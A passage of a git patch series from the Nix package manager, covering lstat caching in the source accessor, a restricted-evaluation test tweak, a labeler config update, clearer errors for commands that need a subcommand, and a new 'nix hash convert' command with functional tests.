+std::optional PosixSourceAccessor::cachedLstat(const CanonPath & path) +{ + static Sync>> _cache; + + { + auto cache(_cache.lock()); + auto i = cache->find(path); + if (i != cache->end()) return i->second; + } + + std::optional st{std::in_place}; + if (::lstat(path.c_str(), &*st)) { + if (errno == ENOENT || errno == ENOTDIR) + st.reset(); + else + throw SysError("getting status of '%s'", showPath(path)); + } + + auto cache(_cache.lock()); + if (cache->size() >= 16384) cache->clear(); + cache->emplace(path, st); + + return st; +} + std::optional PosixSourceAccessor::maybeLstat(const CanonPath & path) { if (auto parent = path.parent()) assertNoSymlinks(*parent); - struct stat st; - if (::lstat(path.c_str(), &st)) { - if (errno == ENOENT || errno == ENOTDIR) return std::nullopt; - throw SysError("getting status of '%s'", showPath(path)); - } - mtime = std::max(mtime, st.st_mtime); + auto st = cachedLstat(path); + if (!st) return std::nullopt; + mtime = std::max(mtime, st->st_mtime); return Stat { .type = - S_ISREG(st.st_mode) ? tRegular : - S_ISDIR(st.st_mode) ? tDirectory : - S_ISLNK(st.st_mode) ? tSymlink : + S_ISREG(st->st_mode) ? tRegular : + S_ISDIR(st->st_mode) ? tDirectory : + S_ISLNK(st->st_mode) ? tSymlink : tMisc, - .fileSize = S_ISREG(st.st_mode) ? std::optional(st.st_size) : std::nullopt, - .isExecutable = S_ISREG(st.st_mode) && st.st_mode & S_IXUSR, + .fileSize = S_ISREG(st->st_mode) ? std::optional(st->st_size) : std::nullopt, + .isExecutable = S_ISREG(st->st_mode) && st->st_mode & S_IXUSR, }; } @@ -95,14 +120,9 @@ std::optional PosixSourceAccessor::getPhysicalPath(const CanonPath & void PosixSourceAccessor::assertNoSymlinks(CanonPath path) { - // FIXME: cache this since it potentially causes a lot of lstat calls. while (!path.isRoot()) { - struct stat st; - if (::lstat(path.c_str(), &st)) { - if (errno != ENOENT) - throw SysError("getting status of '%s'", showPath(path)); - } - if (S_ISLNK(st.st_mode)) + auto st = cachedLstat(path); + if (st && S_ISLNK(st->st_mode)) throw Error("path '%s' is a symlink", showPath(path)); path.pop(); } diff --git a/src/libutil/posix-source-accessor.hh b/src/libutil/posix-source-accessor.hh index 7189a40e5..b2bd39805 100644 --- a/src/libutil/posix-source-accessor.hh +++ b/src/libutil/posix-source-accessor.hh @@ -30,10 +30,14 @@ struct PosixSourceAccessor : virtual SourceAccessor std::optional getPhysicalPath(const CanonPath & path) override; +private: + /** * Throw an error if `path` or any of its ancestors are symlinks. */ void assertNoSymlinks(CanonPath path); + + std::optional cachedLstat(const CanonPath & path); }; } From 53ab5d87c2eef72202bd76eb43e072636bbc72e8 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 6 Dec 2023 14:05:32 +0100 Subject: [PATCH 051/654] Use expectStderr --- tests/functional/restricted.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/functional/restricted.sh b/tests/functional/restricted.sh index 2d6ab964b..3de26eb36 100644 --- a/tests/functional/restricted.sh +++ b/tests/functional/restricted.sh @@ -14,7 +14,7 @@ nix-instantiate --restrict-eval --eval -E 'builtins.readFile ./simple.nix' -I sr (! nix-instantiate --restrict-eval --eval -E 'builtins.readDir ../../src/nix-channel') nix-instantiate --restrict-eval --eval -E 'builtins.readDir ../../src/nix-channel' -I src=../../src -(! nix-instantiate --restrict-eval --eval -E 'let __nixPath = [ { prefix = "foo"; path = ./.; } ]; in builtins.readFile ') +expectStderr 1 nix-instantiate --restrict-eval --eval -E 'let __nixPath = [ { prefix = "foo"; path = ./.; } ]; in builtins.readFile ' | grepQuiet "forbidden in restricted mode" nix-instantiate --restrict-eval --eval -E 'let __nixPath = [ { prefix = "foo"; path = ./.; } ]; in builtins.readFile ' -I src=. p=$(nix eval --raw --expr "builtins.fetchurl file://$(pwd)/restricted.sh" --impure --restrict-eval --allowed-uris "file://$(pwd)") From ee8540ae9055791cfec4cbf8cb6335368b867acc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= <7226587+thufschmitt@users.noreply.github.com> Date: Wed, 6 Dec 2023 14:07:08 +0100 Subject: [PATCH 052/654] Fix the labeler.yml config file labeler 5.0 changed the configuration file in a non-backwards-compatible way (https://github.com/actions/labeler/tree/main#breaking-changes-in-v5), so update our config file to match that (because all the CIs are red otherwise :grimacing: ). --- .github/labeler.yml | 31 +++++++++++++++++++------------ 1 file changed, 19 insertions(+), 12 deletions(-) diff --git a/.github/labeler.yml b/.github/labeler.yml index 7544f07a6..b1b18c488 100644 --- a/.github/labeler.yml +++ b/.github/labeler.yml @@ -1,23 +1,30 @@ "documentation": - - doc/manual/* - - src/nix/**/*.md + - changed-files: + - any-glob-to-any-file: "doc/manual/*" + - any-glob-to-any-file: "src/nix/**/*.md" "store": - - src/libstore/store-api.* - - src/libstore/*-store.* + - changed-files: + - any-glob-to-any-file: "src/libstore/store-api.*" + - any-glob-to-any-file: "src/libstore/*-store.*" "fetching": - - src/libfetchers/**/* + - changed-files: + - any-glob-to-any-file: "src/libfetchers/**/*" "repl": - - src/libcmd/repl.* - - src/nix/repl.* + - changed-files: + - any-glob-to-any-file: "src/libcmd/repl.*" + - any-glob-to-any-file: "src/nix/repl.*" "new-cli": - - src/nix/**/* + - changed-files: + - any-glob-to-any-file: "src/nix/**/*" "with-tests": - # Unit tests - - src/*/tests/**/* - # Functional and integration tests - - tests/functional/**/* + - changed-files: + # Unit tests + - any-glob-to-any-file: "src/*/tests/**/*" + # Functional and integration tests + - any-glob-to-any-file: "tests/functional/**/*" + From 2bd83225004012af97d2d5977dc1de952f60aa8d Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 6 Dec 2023 14:08:40 +0100 Subject: [PATCH 053/654] Update src/libfetchers/filtering-input-accessor.hh Co-authored-by: Robert Hensing --- src/libfetchers/filtering-input-accessor.hh | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/src/libfetchers/filtering-input-accessor.hh b/src/libfetchers/filtering-input-accessor.hh index 209d26974..e1b83c929 100644 --- a/src/libfetchers/filtering-input-accessor.hh +++ b/src/libfetchers/filtering-input-accessor.hh @@ -13,8 +13,8 @@ typedef std::function MakeNotAllowe /** * An abstract wrapping `InputAccessor` that performs access - * control. Subclasses should override `checkAccess()` to implement an - * access control policy. + * control. Subclasses should override `isAllowed()` to implement an + * access control policy. The error message is customized at construction. */ struct FilteringInputAccessor : InputAccessor { From 7fff625e39fa6b11c4c61eeacadc70a0253bdab6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= <7226587+thufschmitt@users.noreply.github.com> Date: Wed, 6 Dec 2023 14:13:45 +0100 Subject: [PATCH 054/654] =?UTF-8?q?Improve=20the=20error=20message=20for?= =?UTF-8?q?=20=E2=80=9Cmulticommands=E2=80=9D=20commands=20(#9510)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Factor out the default `MultiCommand` behavior All the `MultiCommand`s had (nearly) the same behavior when called without a subcommand. Factor out this behavior into the `NixMultiCommand` class. * Display the list of available subcommands when none is specified Whenever a user runs a command that excepts a subcommand, add the list of available subcommands to the error message. * Print the multi-command lists as Markdown lists This takes more screen real estate, but is also much more readable than a comma-separated list --- src/libcmd/command.cc | 14 ++++++++++++++ src/libcmd/command.hh | 6 +++++- src/libutil/args.cc | 5 +++-- src/libutil/args.hh | 9 ++++++--- src/nix/config.cc | 11 ++--------- src/nix/derivation.cc | 11 ++--------- src/nix/flake.cc | 8 ++++---- src/nix/hash.cc | 11 +++-------- src/nix/main.cc | 2 +- src/nix/nar.cc | 9 +-------- src/nix/profile.cc | 11 +++-------- src/nix/realisation.cc | 11 ++--------- src/nix/registry.cc | 14 ++++---------- src/nix/sigs.cc | 11 +++-------- src/nix/store.cc | 11 ++--------- 15 files changed, 55 insertions(+), 89 deletions(-) diff --git a/src/libcmd/command.cc b/src/libcmd/command.cc index de9f546fc..369fa6004 100644 --- a/src/libcmd/command.cc +++ b/src/libcmd/command.cc @@ -1,4 +1,5 @@ #include "command.hh" +#include "markdown.hh" #include "store-api.hh" #include "local-fs-store.hh" #include "derivations.hh" @@ -34,6 +35,19 @@ nlohmann::json NixMultiCommand::toJSON() return MultiCommand::toJSON(); } +void NixMultiCommand::run() +{ + if (!command) { + std::set subCommandTextLines; + for (auto & [name, _] : commands) + subCommandTextLines.insert(fmt("- `%s`", name)); + std::string markdownError = fmt("`nix %s` requires a sub-command. Available sub-commands:\n\n%s\n", + commandName, concatStringsSep("\n", subCommandTextLines)); + throw UsageError(renderMarkdownToTerminal(markdownError)); + } + command->second->run(); +} + StoreCommand::StoreCommand() { } diff --git a/src/libcmd/command.hh b/src/libcmd/command.hh index 120c832ac..4a72627ed 100644 --- a/src/libcmd/command.hh +++ b/src/libcmd/command.hh @@ -26,9 +26,13 @@ static constexpr Command::Category catNixInstallation = 102; static constexpr auto installablesCategory = "Options that change the interpretation of [installables](@docroot@/command-ref/new-cli/nix.md#installables)"; -struct NixMultiCommand : virtual MultiCommand, virtual Command +struct NixMultiCommand : MultiCommand, virtual Command { nlohmann::json toJSON() override; + + using MultiCommand::MultiCommand; + + virtual void run() override; }; // For the overloaded run methods diff --git a/src/libutil/args.cc b/src/libutil/args.cc index 4480a03f5..c4b2975ee 100644 --- a/src/libutil/args.cc +++ b/src/libutil/args.cc @@ -483,7 +483,7 @@ bool Args::processArgs(const Strings & args, bool finish) if (!anyCompleted) exp.handler.fun(ss); - /* Move the list element to the processedArgs. This is almost the same as + /* Move the list element to the processedArgs. This is almost the same as `processedArgs.push_back(expectedArgs.front()); expectedArgs.pop_front()`, except that it will only adjust the next and prev pointers of the list elements, meaning the actual contents don't move in memory. This is @@ -622,8 +622,9 @@ std::optional Command::experimentalFeature () return { Xp::NixCommand }; } -MultiCommand::MultiCommand(const Commands & commands_) +MultiCommand::MultiCommand(std::string_view commandName, const Commands & commands_) : commands(commands_) + , commandName(commandName) { expectArgs({ .label = "subcommand", diff --git a/src/libutil/args.hh b/src/libutil/args.hh index 7af82b178..72278dccc 100644 --- a/src/libutil/args.hh +++ b/src/libutil/args.hh @@ -223,11 +223,11 @@ protected: std::list expectedArgs; /** * List of processed positional argument forms. - * + * * All items removed from `expectedArgs` are added here. After all * arguments were processed, this list should be exactly the same as * `expectedArgs` was before. - * + * * This list is used to extend the lifetime of the argument forms. * If this is not done, some closures that reference the command * itself will segfault. @@ -356,13 +356,16 @@ public: */ std::optional>> command; - MultiCommand(const Commands & commands); + MultiCommand(std::string_view commandName, const Commands & commands); bool processFlag(Strings::iterator & pos, Strings::iterator end) override; bool processArgs(const Strings & args, bool finish) override; nlohmann::json toJSON() override; + +protected: + std::string commandName = ""; }; Strings argvToStrings(int argc, char * * argv); diff --git a/src/nix/config.cc b/src/nix/config.cc index 5b280d11d..52706afcf 100644 --- a/src/nix/config.cc +++ b/src/nix/config.cc @@ -7,9 +7,9 @@ using namespace nix; -struct CmdConfig : virtual NixMultiCommand +struct CmdConfig : NixMultiCommand { - CmdConfig() : MultiCommand(RegisterCommand::getCommandsFor({"config"})) + CmdConfig() : NixMultiCommand("config", RegisterCommand::getCommandsFor({"config"})) { } std::string description() override @@ -18,13 +18,6 @@ struct CmdConfig : virtual NixMultiCommand } Category category() override { return catUtility; } - - void run() override - { - if (!command) - throw UsageError("'nix config' requires a sub-command."); - command->second->run(); - } }; struct CmdConfigShow : Command, MixJSON diff --git a/src/nix/derivation.cc b/src/nix/derivation.cc index cd3975a4f..59a78d378 100644 --- a/src/nix/derivation.cc +++ b/src/nix/derivation.cc @@ -2,9 +2,9 @@ using namespace nix; -struct CmdDerivation : virtual NixMultiCommand +struct CmdDerivation : NixMultiCommand { - CmdDerivation() : MultiCommand(RegisterCommand::getCommandsFor({"derivation"})) + CmdDerivation() : NixMultiCommand("derivation", RegisterCommand::getCommandsFor({"derivation"})) { } std::string description() override @@ -13,13 +13,6 @@ struct CmdDerivation : virtual NixMultiCommand } Category category() override { return catUtility; } - - void run() override - { - if (!command) - throw UsageError("'nix derivation' requires a sub-command."); - command->second->run(); - } }; static auto rCmdDerivation = registerCommand("derivation"); diff --git a/src/nix/flake.cc b/src/nix/flake.cc index e0c67fdfa..2b6e56283 100644 --- a/src/nix/flake.cc +++ b/src/nix/flake.cc @@ -1399,7 +1399,9 @@ struct CmdFlakePrefetch : FlakeCommand, MixJSON struct CmdFlake : NixMultiCommand { CmdFlake() - : MultiCommand({ + : NixMultiCommand( + "flake", + { {"update", []() { return make_ref(); }}, {"lock", []() { return make_ref(); }}, {"metadata", []() { return make_ref(); }}, @@ -1429,10 +1431,8 @@ struct CmdFlake : NixMultiCommand void run() override { - if (!command) - throw UsageError("'nix flake' requires a sub-command."); experimentalFeatureSettings.require(Xp::Flakes); - command->second->run(); + NixMultiCommand::run(); } }; diff --git a/src/nix/hash.cc b/src/nix/hash.cc index d6595dcca..ededf6ef2 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -130,7 +130,9 @@ struct CmdToBase : Command struct CmdHash : NixMultiCommand { CmdHash() - : MultiCommand({ + : NixMultiCommand( + "hash", + { {"file", []() { return make_ref(FileIngestionMethod::Flat);; }}, {"path", []() { return make_ref(FileIngestionMethod::Recursive); }}, {"to-base16", []() { return make_ref(HashFormat::Base16); }}, @@ -146,13 +148,6 @@ struct CmdHash : NixMultiCommand } Category category() override { return catUtility; } - - void run() override - { - if (!command) - throw UsageError("'nix hash' requires a sub-command."); - command->second->run(); - } }; static auto rCmdHash = registerCommand("hash"); diff --git a/src/nix/main.cc b/src/nix/main.cc index 3d44e4a9d..109d2cc04 100644 --- a/src/nix/main.cc +++ b/src/nix/main.cc @@ -67,7 +67,7 @@ struct NixArgs : virtual MultiCommand, virtual MixCommonArgs, virtual RootArgs bool helpRequested = false; bool showVersion = false; - NixArgs() : MultiCommand(RegisterCommand::getCommandsFor({})), MixCommonArgs("nix") + NixArgs() : MultiCommand("", RegisterCommand::getCommandsFor({})), MixCommonArgs("nix") { categories.clear(); categories[catHelp] = "Help commands"; diff --git a/src/nix/nar.cc b/src/nix/nar.cc index 9815410cf..8ad4f92a7 100644 --- a/src/nix/nar.cc +++ b/src/nix/nar.cc @@ -4,7 +4,7 @@ using namespace nix; struct CmdNar : NixMultiCommand { - CmdNar() : MultiCommand(RegisterCommand::getCommandsFor({"nar"})) + CmdNar() : NixMultiCommand("nar", RegisterCommand::getCommandsFor({"nar"})) { } std::string description() override @@ -20,13 +20,6 @@ struct CmdNar : NixMultiCommand } Category category() override { return catUtility; } - - void run() override - { - if (!command) - throw UsageError("'nix nar' requires a sub-command."); - command->second->run(); - } }; static auto rCmdNar = registerCommand("nar"); diff --git a/src/nix/profile.cc b/src/nix/profile.cc index 476ddcd60..147b4680b 100644 --- a/src/nix/profile.cc +++ b/src/nix/profile.cc @@ -825,7 +825,9 @@ struct CmdProfileWipeHistory : virtual StoreCommand, MixDefaultProfile, MixDryRu struct CmdProfile : NixMultiCommand { CmdProfile() - : MultiCommand({ + : NixMultiCommand( + "profile", + { {"install", []() { return make_ref(); }}, {"remove", []() { return make_ref(); }}, {"upgrade", []() { return make_ref(); }}, @@ -848,13 +850,6 @@ struct CmdProfile : NixMultiCommand #include "profile.md" ; } - - void run() override - { - if (!command) - throw UsageError("'nix profile' requires a sub-command."); - command->second->run(); - } }; static auto rCmdProfile = registerCommand("profile"); diff --git a/src/nix/realisation.cc b/src/nix/realisation.cc index e19e93219..e1f231222 100644 --- a/src/nix/realisation.cc +++ b/src/nix/realisation.cc @@ -5,9 +5,9 @@ using namespace nix; -struct CmdRealisation : virtual NixMultiCommand +struct CmdRealisation : NixMultiCommand { - CmdRealisation() : MultiCommand(RegisterCommand::getCommandsFor({"realisation"})) + CmdRealisation() : NixMultiCommand("realisation", RegisterCommand::getCommandsFor({"realisation"})) { } std::string description() override @@ -16,13 +16,6 @@ struct CmdRealisation : virtual NixMultiCommand } Category category() override { return catUtility; } - - void run() override - { - if (!command) - throw UsageError("'nix realisation' requires a sub-command."); - command->second->run(); - } }; static auto rCmdRealisation = registerCommand("realisation"); diff --git a/src/nix/registry.cc b/src/nix/registry.cc index f509ccae8..0346ec1e0 100644 --- a/src/nix/registry.cc +++ b/src/nix/registry.cc @@ -196,10 +196,12 @@ struct CmdRegistryPin : RegistryCommand, EvalCommand } }; -struct CmdRegistry : virtual NixMultiCommand +struct CmdRegistry : NixMultiCommand { CmdRegistry() - : MultiCommand({ + : NixMultiCommand( + "registry", + { {"list", []() { return make_ref(); }}, {"add", []() { return make_ref(); }}, {"remove", []() { return make_ref(); }}, @@ -221,14 +223,6 @@ struct CmdRegistry : virtual NixMultiCommand } Category category() override { return catSecondary; } - - void run() override - { - experimentalFeatureSettings.require(Xp::Flakes); - if (!command) - throw UsageError("'nix registry' requires a sub-command."); - command->second->run(); - } }; static auto rCmdRegistry = registerCommand("registry"); diff --git a/src/nix/sigs.cc b/src/nix/sigs.cc index 39555c9ea..a57a407e6 100644 --- a/src/nix/sigs.cc +++ b/src/nix/sigs.cc @@ -205,7 +205,9 @@ struct CmdKeyConvertSecretToPublic : Command struct CmdKey : NixMultiCommand { CmdKey() - : MultiCommand({ + : NixMultiCommand( + "key", + { {"generate-secret", []() { return make_ref(); }}, {"convert-secret-to-public", []() { return make_ref(); }}, }) @@ -218,13 +220,6 @@ struct CmdKey : NixMultiCommand } Category category() override { return catUtility; } - - void run() override - { - if (!command) - throw UsageError("'nix key' requires a sub-command."); - command->second->run(); - } }; static auto rCmdKey = registerCommand("key"); diff --git a/src/nix/store.cc b/src/nix/store.cc index 2879e03b3..79b41e096 100644 --- a/src/nix/store.cc +++ b/src/nix/store.cc @@ -2,9 +2,9 @@ using namespace nix; -struct CmdStore : virtual NixMultiCommand +struct CmdStore : NixMultiCommand { - CmdStore() : MultiCommand(RegisterCommand::getCommandsFor({"store"})) + CmdStore() : NixMultiCommand("store", RegisterCommand::getCommandsFor({"store"})) { } std::string description() override @@ -13,13 +13,6 @@ struct CmdStore : virtual NixMultiCommand } Category category() override { return catUtility; } - - void run() override - { - if (!command) - throw UsageError("'nix store' requires a sub-command."); - command->second->run(); - } }; static auto rCmdStore = registerCommand("store"); From e7abf60a0c8db19927e4fb195789b698c84e8d5a Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Sat, 25 Nov 2023 17:33:44 +0100 Subject: [PATCH 055/654] hash.cc/hash.h: Minor C++ improvements --- src/libutil/hash.hh | 14 +++++++------- src/nix/hash.cc | 2 +- 2 files changed, 8 insertions(+), 8 deletions(-) diff --git a/src/libutil/hash.hh b/src/libutil/hash.hh index 6ade6555c..0e5c91b79 100644 --- a/src/libutil/hash.hh +++ b/src/libutil/hash.hh @@ -52,7 +52,7 @@ struct Hash /** * Create a zero-filled hash object. */ - Hash(HashType type); + explicit Hash(HashType type); /** * Parse the hash from a string representation in the format @@ -103,7 +103,7 @@ public: /** * Returns the length of a base-16 representation of this hash. */ - size_t base16Len() const + [[nodiscard]] size_t base16Len() const { return hashSize * 2; } @@ -111,7 +111,7 @@ public: /** * Returns the length of a base-32 representation of this hash. */ - size_t base32Len() const + [[nodiscard]] size_t base32Len() const { return (hashSize * 8 - 1) / 5 + 1; } @@ -119,7 +119,7 @@ public: /** * Returns the length of a base-64 representation of this hash. */ - size_t base64Len() const + [[nodiscard]] size_t base64Len() const { return ((4 * hashSize / 3) + 3) & ~3; } @@ -129,14 +129,14 @@ public: * or base-64. By default, this is prefixed by the hash type * (e.g. "sha256:"). */ - std::string to_string(HashFormat hashFormat, bool includeType) const; + [[nodiscard]] std::string to_string(HashFormat hashFormat, bool includeType) const; - std::string gitRev() const + [[nodiscard]] std::string gitRev() const { return to_string(HashFormat::Base16, false); } - std::string gitShortRev() const + [[nodiscard]] std::string gitShortRev() const { return std::string(to_string(HashFormat::Base16, false), 0, 7); } diff --git a/src/nix/hash.cc b/src/nix/hash.cc index ededf6ef2..cac65006b 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -17,7 +17,7 @@ struct CmdHashBase : Command std::vector paths; std::optional modulus; - CmdHashBase(FileIngestionMethod mode) : mode(mode) + explicit CmdHashBase(FileIngestionMethod mode) : mode(mode) { addFlag({ .longName = "sri", From 156ea78d7402368e3816855800eb6e0ed33a1ecc Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Sat, 25 Nov 2023 17:34:16 +0100 Subject: [PATCH 056/654] CmdHashBase: doc comment --- src/nix/hash.cc | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/src/nix/hash.cc b/src/nix/hash.cc index cac65006b..dfef44221 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -8,6 +8,11 @@ using namespace nix; +/** + * Base for `nix hash file` (deprecated), `nix hash path` and `nix-hash` (legacy). + * + * Deprecation Issue: https://github.com/NixOS/nix/issues/8876 + */ struct CmdHashBase : Command { FileIngestionMethod mode; From 6bbd900d4f9983f74dcd9a0f85ab899331f661c7 Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Sat, 25 Nov 2023 17:35:24 +0100 Subject: [PATCH 057/654] nix hash convert: added This deviated from the proposal! See comments on the issue. https://github.com/NixOS/nix/issues/8876 --- src/nix/hash.cc | 63 ++++++++++++++++++++++++++++++++++++++++ tests/functional/hash.sh | 19 +++++++++++- 2 files changed, 81 insertions(+), 1 deletion(-) diff --git a/src/nix/hash.cc b/src/nix/hash.cc index dfef44221..2b32ac03c 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -132,12 +132,75 @@ struct CmdToBase : Command } }; +/** + * `nix hash convert` + */ +struct CmdHashConvert : Command +{ + std::optional from; + HashFormat to; + std::optional type; + std::vector hashStrings; + + CmdHashConvert(): to(HashFormat::SRI) { + addFlag({ + .longName = "from", + // TODO: List format choices. Maybe introduce a constant? + .description = "The format of the input hash.", + .labels = {"hash format"}, + .handler = {[this](std::string str) { + from = parseHashFormat(str); + }}, + }); + addFlag({ + .longName = "to", + // TODO: List format choices. Maybe introduce a constant? + .description = "The format of the output hash.", + .labels = {"hash format"}, + .handler = {[this](std::string str) { + to = parseHashFormat(str); + }}, + }); + addFlag({ + .longName = "type", + .description = "Specify the type if it can't be auto-detected.", + .labels = {"hash type"}, + .handler = {[this](std::string str) { + type = parseHashType(str); + }}, + }); + expectArgs({ + .label = "hashes", + .handler = {&hashStrings}, + }); + } + + std::string description() override + { + return "convert between different hash formats, e.g. base16 and sri."; + } + + Category category() override { return catUtility; } + + void run() override { + for (const auto& s: hashStrings) { + Hash h = Hash::parseAny(s, type); + if (from && h.to_string(*from, from == HashFormat::SRI) != s) { + auto from_as_string = printHashFormat(*from); + throw BadHash("input hash '%s' does not have the expected format '--from %s'", s, from_as_string); + } + logger->cout(h.to_string(to, to == HashFormat::SRI)); + } + } +}; + struct CmdHash : NixMultiCommand { CmdHash() : NixMultiCommand( "hash", { + {"convert", []() { return make_ref();}}, {"file", []() { return make_ref(FileIngestionMethod::Flat);; }}, {"path", []() { return make_ref(FileIngestionMethod::Recursive); }}, {"to-base16", []() { return make_ref(HashFormat::Base16); }}, diff --git a/tests/functional/hash.sh b/tests/functional/hash.sh index 34c1bb38a..d66b27a26 100644 --- a/tests/functional/hash.sh +++ b/tests/functional/hash.sh @@ -81,24 +81,41 @@ rm $TEST_ROOT/hash-path/hello ln -s x $TEST_ROOT/hash-path/hello try2 md5 "f78b733a68f5edbdf9413899339eaa4a" -# Conversion. +# Conversion with `nix hash` `nix-hash` and `nix hash convert` try3() { + # $1 = hash type + # $2 = expected hash in base16 + # $3 = expected hash in base32 + # $4 = expected hash in base64 + h64=$(nix hash convert --type "$1" --to base64 "$2") + [ "$h64" = "$4" ] h64=$(nix-hash --type "$1" --to-base64 "$2") [ "$h64" = "$4" ] + # Deprecated experiment h64=$(nix hash to-base64 --type "$1" "$2") [ "$h64" = "$4" ] + + sri=$(nix hash convert --type "$1" --to sri "$2") + [ "$sri" = "$1-$4" ] sri=$(nix-hash --type "$1" --to-sri "$2") [ "$sri" = "$1-$4" ] sri=$(nix hash to-sri --type "$1" "$2") [ "$sri" = "$1-$4" ] + h32=$(nix hash convert --type "$1" --to base32 "$2") + [ "$h32" = "$3" ] h32=$(nix-hash --type "$1" --to-base32 "$2") [ "$h32" = "$3" ] h32=$(nix hash to-base32 --type "$1" "$2") [ "$h32" = "$3" ] h16=$(nix-hash --type "$1" --to-base16 "$h32") [ "$h16" = "$2" ] + + h16=$(nix hash convert --type "$1" --to base16 "$h64") + [ "$h16" = "$2" ] h16=$(nix hash to-base16 --type "$1" "$h64") [ "$h16" = "$2" ] + h16=$(nix hash convert --to base16 "$sri") + [ "$h16" = "$2" ] h16=$(nix hash to-base16 "$sri") [ "$h16" = "$2" ] } From 0c2d5f7673ae0196b660c39b59941755103c23d0 Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Tue, 28 Nov 2023 11:42:52 +0100 Subject: [PATCH 058/654] nix hash convert: s/--type/--algo/ + more functional tests https://github.com/NixOS/nix/issues/8876 --- src/libutil/hash.hh | 1 - src/nix/hash.cc | 8 ++--- tests/functional/hash.sh | 72 +++++++++++++++++++++++++++++++++++++--- 3 files changed, 71 insertions(+), 10 deletions(-) diff --git a/src/libutil/hash.hh b/src/libutil/hash.hh index 0e5c91b79..820154e7a 100644 --- a/src/libutil/hash.hh +++ b/src/libutil/hash.hh @@ -40,7 +40,6 @@ enum struct HashFormat : int { SRI }; - struct Hash { constexpr static size_t maxHashSize = 64; diff --git a/src/nix/hash.cc b/src/nix/hash.cc index 2b32ac03c..62f96ef1d 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -162,9 +162,9 @@ struct CmdHashConvert : Command }}, }); addFlag({ - .longName = "type", - .description = "Specify the type if it can't be auto-detected.", - .labels = {"hash type"}, + .longName = "algo", + .description = "Specify the algorithm if it can't be auto-detected.", + .labels = {"hash algorithm"}, .handler = {[this](std::string str) { type = parseHashType(str); }}, @@ -177,7 +177,7 @@ struct CmdHashConvert : Command std::string description() override { - return "convert between different hash formats, e.g. base16 and sri."; + return "convert between different hash formats, e.g. base16, nix32, base64 and sri."; } Category category() override { return catUtility; } diff --git a/tests/functional/hash.sh b/tests/functional/hash.sh index d66b27a26..031e33adf 100644 --- a/tests/functional/hash.sh +++ b/tests/functional/hash.sh @@ -83,11 +83,11 @@ try2 md5 "f78b733a68f5edbdf9413899339eaa4a" # Conversion with `nix hash` `nix-hash` and `nix hash convert` try3() { - # $1 = hash type + # $1 = hash algo # $2 = expected hash in base16 # $3 = expected hash in base32 # $4 = expected hash in base64 - h64=$(nix hash convert --type "$1" --to base64 "$2") + h64=$(nix hash convert --algo "$1" --to base64 "$2") [ "$h64" = "$4" ] h64=$(nix-hash --type "$1" --to-base64 "$2") [ "$h64" = "$4" ] @@ -95,13 +95,13 @@ try3() { h64=$(nix hash to-base64 --type "$1" "$2") [ "$h64" = "$4" ] - sri=$(nix hash convert --type "$1" --to sri "$2") + sri=$(nix hash convert --algo "$1" --to sri "$2") [ "$sri" = "$1-$4" ] sri=$(nix-hash --type "$1" --to-sri "$2") [ "$sri" = "$1-$4" ] sri=$(nix hash to-sri --type "$1" "$2") [ "$sri" = "$1-$4" ] - h32=$(nix hash convert --type "$1" --to base32 "$2") + h32=$(nix hash convert --algo "$1" --to base32 "$2") [ "$h32" = "$3" ] h32=$(nix-hash --type "$1" --to-base32 "$2") [ "$h32" = "$3" ] @@ -110,7 +110,7 @@ try3() { h16=$(nix-hash --type "$1" --to-base16 "$h32") [ "$h16" = "$2" ] - h16=$(nix hash convert --type "$1" --to base16 "$h64") + h16=$(nix hash convert --algo "$1" --to base16 "$h64") [ "$h16" = "$2" ] h16=$(nix hash to-base16 --type "$1" "$h64") [ "$h16" = "$2" ] @@ -118,7 +118,69 @@ try3() { [ "$h16" = "$2" ] h16=$(nix hash to-base16 "$sri") [ "$h16" = "$2" ] + + # + # Converting from SRI + # + + # Input hash algo auto-detected from SRI and output defaults to SRI as well. + sri=$(nix hash convert "$1-$4") + [ "$sri" = "$1-$4" ] + + sri=$(nix hash convert --from sri "$1-$4") + [ "$sri" = "$1-$4" ] + + sri=$(nix hash convert --to sri "$1-$4") + [ "$sri" = "$1-$4" ] + + sri=$(nix hash convert --from sri --to sri "$1-$4") + [ "$sri" = "$1-$4" ] + + sri=$(nix hash convert --to base64 "$1-$4") + [ "$sri" = "$4" ] + + # + # Auto-detecting the input from algo and length. + # + + sri=$(nix hash convert --algo "$1" "$2") + [ "$sri" = "$1-$4" ] + sri=$(nix hash convert --algo "$1" "$3") + [ "$sri" = "$1-$4" ] + sri=$(nix hash convert --algo "$1" "$4") + [ "$sri" = "$1-$4" ] + + sri=$(nix hash convert --algo "$1" "$2") + [ "$sri" = "$1-$4" ] + sri=$(nix hash convert --algo "$1" "$3") + [ "$sri" = "$1-$4" ] + sri=$(nix hash convert --algo "$1" "$4") + [ "$sri" = "$1-$4" ] + + # + # Asserting input format succeeds. + # + + sri=$(nix hash convert --algo "$1" --from base16 "$2") + [ "$sri" = "$1-$4" ] + sri=$(nix hash convert --algo "$1" --from base32 "$3") + [ "$sri" = "$1-$4" ] + sri=$(nix hash convert --algo "$1" --from base64 "$4") + [ "$sri" = "$1-$4" ] + + # + # Asserting input format fails. + # + + fail=$(nix hash convert --algo "$1" --from base32 "$2" 2>&1 || echo "exit: $?") + [[ "$fail" == "error: input hash"*"exit: 1" ]] + fail=$(nix hash convert --algo "$1" --from base16 "$3" 2>&1 || echo "exit: $?") + [[ "$fail" == "error: input hash"*"exit: 1" ]] + fail=$(nix hash convert --algo "$1" --from base32 "$4" 2>&1 || echo "exit: $?") + [[ 